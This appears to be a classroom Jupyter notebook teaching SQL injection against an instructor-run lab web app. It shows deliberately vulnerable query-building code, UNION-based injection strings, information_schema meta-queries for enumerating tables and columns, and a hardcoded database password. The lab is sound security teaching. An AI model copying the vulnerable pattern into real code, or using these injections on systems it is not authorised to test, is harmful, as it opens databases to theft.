# SQL Injection

I set up a web application that is running at the URL http://abadd00d.us-west-2.elasticbeanstalk.com This web application contains my secrets. I won't tell you my secrets. Your goal in this notebook is to find my secrets.

You should explore the web application a bit to see how it works. It's not very fancy, but understanding what it does will help with the rest of the notebook.

Somewhere in the application's code, I put in something that looks like this:

In [ ]:
def do_search(word):
    # ...
    # Code ommitted here for simplicity
    # ...
    word=request.forms.get('word')
    query="SELECT * FROM bigrams WHERE word1='"+word+"'"
    mycursor = mydb.cursor()
    mycursor.execute(query)
    myresult=mycursor.fetchall()
    return {'pattern':word,'data':myresult}


This code is vulnerable to SQL injection. The user's input in the variable `word` is directly used to build the SQL query without being sanitized. The intended behavior is something like this:

In [ ]:
word="the"
print("SELECT * FROM bigrams WHERE word1='"+word+"'")

However, we can add to this query to get more information. The `UNION` SQL keyword can be used to combine the results of two queries.

In [ ]:
word="the' UNION SELECT * FROM bigrams WHERE word2='him"
print("SELECT * FROM bigrams WHERE word1='"+word+"'")

Try putting the contents of `word` from that last cell into the web application bigrams search. You should see more results, because we've added a second SQL query to query more data from the database. We're not supposed to be able to modify the SQL query itself, but that's exactly what we're doing. This is SQL injection. We're giving input to the application that modifies the SQL query itself.

Using `UNION` to combine two query results can be tricky. Try running this injection attack, for example.

In [ ]:
word="the' UNION SELECT * FROM trigrams WHERE word2='him"
print("SELECT * FROM bigrams WHERE word1='"+word+"'")

You should see an error message like `The used SELECT statements have a different number of columns`. That's because the `bigrams` and `trigrams` tables don't have the same numer of columns. If we want to use UNION to combine the results of two queries, we have to make the number of columns match. We can easily do that by messing with the `SELECT` clause of the query. We can, for example, just request the same column over and over again.

In [ ]:
word="the' UNION SELECT word2,word2,word2 FROM trigrams WHERE word2='him"
print("SELECT * FROM bigrams WHERE word1='"+word+"'")

Getting more output from the application might be useful to an attacker in some other circumstance, but your goal is to find secrets. You need to learn what other data is in the database.

## Meta-queries

There are databases in MySQL that contain information about MySQL. This means we can write queries to answer questions about state of MySQL itself. For our SQL injection attack, we would like to know what data we might extract from the web application. We can inject meta-queries to learn about the database. We can then use what we learn to write further SQL injections.

Let's connect to the 'employees' example from last week to see some relevant examples of meta-queries. First, we might like to know what database we're connected to. This is obviously the 'employees' database, but it's only obvious to us because we're looking at the source code. We won't have the source code when we're performing SQL injection!

In [ ]:
import mysql.connector

database=mysql.connector.connect(user='webapp',
                                 passwd='Bkypqyxa',
                                 database='employees')
cursor=database.cursor()

query='''
SELECT DATABASE();
'''

cursor.execute(query)
result=cursor.fetchall()
for x in result:
  print(x)

We also might like to know what tables are available in the database. This query will tell us that.

In [ ]:
import mysql.connector

database=mysql.connector.connect(user='webapp',
                                 passwd='Bkypqyxa',
                                 database='employees')
cursor=database.cursor()

query='''
SELECT table_name
FROM information_schema.tables
WHERE table_schema='employees';
'''

cursor.execute(query)
result=cursor.fetchall()
for x in result:
  print(x)

Once we find a table we're interested in, for example maybe the `titles` table, we'd like to know what columns there are in that table. We can find that with a meta-query like this:

In [ ]:
import mysql.connector

database=mysql.connector.connect(user='webapp',
                                 passwd='Bkypqyxa',
                                 database='employees')
cursor=database.cursor()

query='''
SELECT COLUMN_NAME
  FROM INFORMATION_SCHEMA.COLUMNS
  WHERE TABLE_SCHEMA = 'employees' AND TABLE_NAME = 'titles';
'''
cursor.execute(query)
result=cursor.fetchall()
for x in result:
  print(x)

These two meta-queries should be enough to help you find other tables to query with SQL injection.

## Exercises

Use SQL injection to find all my secrets. Tell me what they are. You've gotta.